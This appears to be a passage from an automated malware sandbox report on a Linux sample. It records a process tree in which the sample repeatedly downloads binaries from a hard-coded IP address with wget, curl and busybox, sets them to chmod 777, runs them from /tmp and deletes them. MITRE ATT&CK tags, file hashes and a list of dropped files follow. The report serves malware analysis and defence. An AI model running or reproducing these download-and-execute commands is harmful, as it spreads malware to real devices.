  /bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:987
- /bin/chmod
  chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - File and Directory Permissions Modification
  PID:988
- /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  ./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - Executes dropped EXE
  PID:989
- /bin/rm
  rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:990
- /usr/bin/wget
  wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:991
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:992
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:993
- /bin/chmod
  chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - File and Directory Permissions Modification
  PID:994
- /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  ./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - Executes dropped EXE
  PID:995
- /bin/rm
  rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:996
- /usr/bin/wget
  wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:997
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:998
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:999
- /bin/chmod
  chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - File and Directory Permissions Modification
  PID:1000
- /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  ./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - Executes dropped EXE
  PID:1001
- /bin/rm
  rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:1002
- /usr/bin/wget
  wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:1003
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1004
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:1005
- /bin/chmod
  chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - File and Directory Permissions Modification
  PID:1006
- /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  ./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - Executes dropped EXE
  PID:1007
- /bin/rm
  rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:1008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J	767	GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d	773	ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ	791	1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0	823	i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ	836	IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g	845	LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto	877	KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC	887	mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev	893	yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD	899	SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1	905	YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL	911	IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz	917	pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0	923	O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto	929	KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC	935	mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev	941	yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD	947	SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1	953	YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL	959	IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz	965	pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0	971	O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J	977	GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d	983	ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ	989	1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0	995	i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ	1001	IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g	1007	LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g